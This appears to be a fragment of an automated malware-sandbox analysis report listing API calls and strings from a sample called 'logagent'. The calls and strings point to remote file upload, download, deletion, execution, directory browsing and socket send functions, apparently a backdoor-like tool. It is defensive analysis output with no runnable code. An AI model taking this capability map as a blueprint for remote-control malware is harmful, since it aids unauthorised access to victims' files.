                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6DF55DF8,00000001,00000000), ref: 00404489
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                  • _wrename.MSVCRT ref: 004044C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                  • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6DF55DF8,?,?,?,?,?,00000055), ref: 004046AC
                                  • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                    • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                    • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                    • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                  • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                  • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                  • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                  • API String ID: 1698304352-2559757301
                                  • Opcode ID: 8ccbc9fa486d0014629f56acd05822ce08dc54dd8e2ab9925d51204abb04f5b3
                                  • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                  • Opcode Fuzzy Hash: 8ccbc9fa486d0014629f56acd05822ce08dc54dd8e2ab9925d51204abb04f5b3
                                  • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00404783
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
